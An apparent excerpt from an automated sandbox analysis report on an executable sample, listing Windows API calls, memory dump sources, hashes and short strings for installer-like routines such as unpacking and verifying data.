                                                                                                              • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                              • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                              • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: Call$N
                                                                                                              • API String ID: 3103080414-3438112850
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-2982765560
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00000DFE), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                                • Part of subcall function 73F9121B: GlobalAlloc.KERNELBASE(00000040,?,73F9123B,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F91225
                                                                                                              • GlobalFree.KERNEL32(?), ref: 73F92657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F9268C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: af98aca9c4231ae0c5fefd3b464772db0eb0a6c045886772139b10566ae07ba1
                                                                                                              • Instruction ID: 7e3221f879faf346e01ee459c7de96f89f86e142f2c212a0a7b07c357772c093
                                                                                                              • Opcode Fuzzy Hash: af98aca9c4231ae0c5fefd3b464772db0eb0a6c045886772139b10566ae07ba1
                                                                                                              • Instruction Fuzzy Hash: 3531FE3210410EEFF716AF54CCA4E2E7BBAFB853803260129F246D7674C731A814CB59
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
